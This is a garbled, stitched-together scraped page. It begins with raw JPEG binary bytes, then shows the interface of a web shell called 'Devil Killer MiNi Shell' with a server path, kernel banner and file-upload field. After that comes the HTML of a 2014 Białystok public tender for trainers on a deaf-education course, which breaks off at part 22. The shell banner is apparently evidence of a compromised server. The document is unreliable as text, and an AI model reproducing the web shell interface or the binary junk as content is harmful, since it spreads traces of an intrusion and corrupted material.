JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140205/41606-N-2014.html

<p class="kh_header"><b>Białystok: Przetarg nieograniczony na pełnienie funkcji kadry szkoleniowej do prowadzenia zajęć na kursie kwalifikacyjnym z zakresu SURDOPEDAGOGIKI</b><br>
<b>Numer ogłoszenia: 41606 - 2014; data zamieszczenia: 05.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Doradztwa Metodycznego , ul. Poleska 27, 15-476 Białystok, woj. podlaskie, tel. 85 6642351, 869 12 50, faks 85 664 23 51 wew. 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.modm.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na pełnienie funkcji kadry szkoleniowej do prowadzenia zajęć na kursie kwalifikacyjnym z zakresu SURDOPEDAGOGIKI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji kadry szkoleniowej do prowadzenia zajęć na kursie kwalifikacyjnym z zakresu Surdopedagogiki z podziałem na 24 części dla jednej grupy nauczycieli. Początek realizacji zamówienia: marzec 2014 roku..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 24.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 3 do SIWZ) oraz na podstawie oświadczenia na temat posiadania wykształcenia,kwalifikacji i doświadczenia (załącznik nr 5 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 3 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie w prowadzeniu szkoleń - 50</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.modm.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.modm.bialystok.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2014 godzina 09:45, miejsce: Miejski Ośrodek Doradztwa Metodycznego w Białymstoku, ul. Poleska 27, 15-476 Białystok, pok. nr 1 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PEDAGOGIKA SPECJALNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Akty prawne dotyczące kształcenia specjalnego: szkoły specjalne, 
integracyjne, ogólnodostępne 
2.	Prawa osób niepełnosprawnych - podstawowe dokumenty.
3.	System kształcenia specjalnego. Nowe tendencje.
4.	Organizacja klas integracyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pedagogika terapeutyczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Pedagogika terapeutyczna
2.	Główne nurty rewalidacji w poszczególnych działach pedagogiki specjalnej. Zagadnienia profilaktyki 
3.	Rewalidacja przewlekle chorych i kalekich..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rewalidacja dzieci głuchych i niedosłyszących  Rewalidacja dzieci niewidomych i niedowidzących.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rewalidacja dzieci głuchych i niedosłyszących  Rewalidacja dzieci niewidomych i niedowidzących.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pedagogika resocjalizacyjna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka:
1.	Pedagogika resocjalizacyjna
2.	Problematyka niedostosowania społecznego.
3.	Sieroctwo społeczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Rewalidacja upośledzonych umysłowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rewalidacja upośledzonych umysłowo.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Surdopedagogika.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Surdopedagogika - sprowadzenie (rewalidacja, proces rewalidacyjny, usprawnienie surdodydaktyczne, kompensacja i korektura surdodydaktyczna).
2.	Terminologia i klasyfikacja w surdopedagogice.
3.	Placówki kształcenia specjalnego dla dzieci z wadą słuchu.
4.	Problematyka integracji dzieci z wadą słuchu (integracyjno - izolacyjne formy nauczania i wychowania, warunki nauczania w szkole specjalnej dla głuchych, warunki i zadania szkoły specjalnej dla głuchych, warunki, jakie musi spełnić dziecko głuche i szkoła masowa).
5.	Przegląd metod rozwoju zdolności językowych dzieci z wadą słuchu (oralne, słuchowe, manualne, dwujęzyczne nauczanie, graficzne).
6.	Zarys rozwoju surdopedagogiki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Diagnoza surdopedagogiczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	 Diagnoza surdopedagogiczna (zespół specjalistów i zakres ich kompensacji).
2.	Kształcenie dzieci z wadą słuchu z upośledzeniem sprzężonym (głusi i niedosłyszący upośledzeni umysłowo, głuchoniewidomi)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Audiologia pedagogiczna I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Anatomia i fizjologia narządu słuchu.
2.	Patofizjologia narządu słuchu.
3.	Uszkodzenia słuchu. Diagnostyka audiologiczna upośledzeń słuchu powstałych w przebiegu uszkodzenia części przewodzeniowej i odbiorczej narządu słuchu.
4.	Charakterystyka różnych typów i stopnia uszkodzenia słuchu.
5.	Rola laryngologa i audiologa w wykrywaniu uszkodzę słuchu 
u dzieci, współudział w procesie rehabilitacji.
6.	Opieka audiologiczna w Polsce.
7.	Ocena wady słuchu a perspektywy rozwojowe dziecka.
8.	Klasyfikacja uszkodzeń słuchu.
9.	Rozwój poglądów na temat zaopatrywania dziecka 
z uszkodzonym słuchem w aparat słuchowy.
10.	Ocena optymalnego czasu aparatowania dzieci z głębokim uszkodzeniem słuchu.
11.	Rola środków wzmacniających w procesie rehabilitacji słuchu 
i mowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Audiologia pedagogiczna II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Rodzaje aparatów słuchowych i ich zastosowanie w zależności od rodzaju i stopnia uszkodzenia słuchu.
2.	Aspekty audiologiczne i psychologiczne doboru odpowiedniego aparatu.
3.	Praktyczne uwagi o użytkowaniu aparatu słuchowego.
4.	Wszczepy ślimakowe - zasady działania, zastosowania i kwalifikacji pacjentów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Surdologopedia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Współczesne poglądy na przedmiot i zadania surdologopedii.
2.	System opieki surdologopedycznej w Polsce.
3.	Czynniki warunkujące rozwój mowy dziecka niesłyszącego 
i niedosłyszącego.
4.	Zaburzenia mowy u dzieci niesłyszących i niedosłyszących.
5.	Diagnoza surdologopedyczna..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Emisja głosu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Emisja głosu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Rewalidacja indywidualna I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Dyspraksja jako szczególna dysfunkcja rzutująca na zaburzenia 
w komunikowaniu się ustnym.
2.	Trening i wychowanie słuchowe.
3.	Metody i zasady prowadzenia rewalidacji indywidualnej.
4.	Formy indywidualnej pracy rewalidacyjnej z dziećmi z wadą słuchu w różnym wieku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Rewalidacja indywidualna II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
Strategia postępowania rewalidacyjnego z małym dzieckiem z wadą słuchu:
-	ćwiczenia ogólnorozwojowe: ćwiczenie koordynacji wzrokowo-ruchowej i oddechu przygotowujące do odczytywania wypowiedzi z ust, ćwiczenia sprawności manualnej przygotowujące do przekazu daktylograficznego, stymulacja i rozwój reakcji emocjonalnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Rewalidacja indywidualna III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
Strategia postępowania terapeutycznego z dziećmi z trudnościami w czytaniu 
i pisaniu:
-	ćwiczenia manualne, graficzne, koncentracji uwagi, orientacji przestrzennej, techniki i sposoby w nauce czytania i pisania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Psychologia głuchych I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Wprowadzenie do psychologicznej problematyki głuchoty.
2.	Deprywacja sensoryczna i lingwistyczna oraz ich wpływ na funkcjonowanie osób z wadą słuchu.
3.	Uszkodzenie słuchu a czynności orientacyjno-poznawcze.
4.	Specyfika rozwoju wrażliwości i spostrzegawczości dzieci z wadą słuchu.
5.	Myślenie, jego rozwój i właściwości u dzieci z wadą słuchu.
6.	Specyfika procesów pamięci u dzieci z wadą słuchu.
7.	Profile kształcenia zawodowego oraz wskazania i przeciwwskazania odnośnie wykonywania niektórych zawodów przez osoby z wadą słuchu.
8.	Zaburzenia fizyczne i psychiczne współwystępujące z głuchotą..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Psychologia głuchych II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Funkcjonowanie intelektualne i poglądy na inteligencję osób z wadą słuchu.
2.	Sposoby porozumiewania się osób z wadą słuchu.
3.	Wpływ wady słuchu na sferę emocjonalną i osobowość..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Psychologia głuchych III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Postawy społeczne i dojrzałość społeczna dzieci i młodzieży z wadą słuchu.
2.	Współpraca nauczycieli z rodzicami.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Manualne sposoby usprawniania języka I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Teoretyczne i praktyczne podstawy języka migowego.
2.	Znaczenie języka migowego w kształtowaniu i rozumieniu pojęć 
u głuchych.
3.	Podstawowe wiadomości o daktylografii i jej stosowaniu.
4.	Wskazówki metodyczne w zakresie korzystania z manualnych sposobów usprawniania języka w procesie dydaktyczno-wychowawczym.
5.	Praktyczne opanowanie umiejętności stosowania daktylografii.
6.	Praktyczne opanowanie umiejętności stosowania wybranych znaków języka migowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Manualne sposoby usprawniania języka II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Podstawowe wiadomości o fonogestach i zasady ich stosowania.
2.	Praktyczne opanowanie umiejętności stosowania fonogestów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Metodyka nauczania i wychowania dzieci z wadą słuchu I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Możliwości i ograniczenia w doborze treści programowych wychowania przedszkolnego dzieci z wadą słuchu.
2.	Stymulacja wrażliwości słuchowej i mowy na zajęciach przedszkolnych.
3.	Formy ćwiczeń wstępnych i ich wykorzystywanie  w procesie dydaktyczno- wychowawczym w przedszkolu.
4.	Rola i formy zabaw dla dzieci z wadą słuchu w okresie przedszkolnym. Znaczenie kształcenia pojęć językowych w okresie przedszkolnym.
5.	Kształtowanie umiejętności matematycznych oraz przyczyny specyficznych trudności w uczeniu się matematyki przez dzieci z wadą słuchu w okresie przedszkolnym.
6.	Dojrzałość szkolna dziecka z wadą słuchu.
7.	Współpraca nauczyciela i wychowawcy na terenie internatu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Metodyka nauczania i wychowania dzieci z wadą słuchu II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
1.	Nauka czytania i pisania w klasie I. Doskonalenie umiejętności czytania i pisania w nauczaniu początkowym.
2.	Gry i zabawy dydaktyczne w nauczaniu początkowym.
3.	Inscenizacja i odgrywanie ról jako wzbogacenie treści nauczania początkowego.
4.	Zadania testowe w nauczaniu początkowym matematyki.
5.	Analiza i rozumienie tekstu przez dzieci z wadą słuchu.
6.	Czytanie tekstu. Proces czytania. Analiza tekstu. Plan tekstu. Opowiadanie tekstu. Opracowywanie charakterystyki. Usamodzielnienie uczniów w procesie analizy tekstu.
7.	Wykorzystanie różnych sposobów porozumiewania się przy analizie tekstu.
8.	Zadania domowe w procesie nauczania i uczenia się dzieci z wadą słuchu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.03.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Metodyka nauczania i wychowania dzieci z wadą słuchu III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tematyka: 
